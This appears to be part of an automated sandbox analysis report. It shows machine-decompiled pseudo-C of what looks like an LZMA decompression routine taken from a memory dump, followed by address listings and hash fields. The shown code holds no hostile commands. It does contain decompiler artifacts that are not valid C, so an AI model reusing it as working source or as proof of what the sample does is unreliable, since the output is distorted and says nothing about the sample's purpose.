											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406f5b
0x00406f5b
0x00406f5f
0x00406f84
0x00406f8e
0x00000000
0x00406f61
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f72
0x00406f75
0x0040704f
0x0040704f
0x00407056
0x00407056
0x00407059
0x00407060
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00000000
0x00000000
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x00000000
0x00407048
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x00000000
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x004071ab
0x004071b1
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x004070ea
0x00000000
0x00406f5f

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
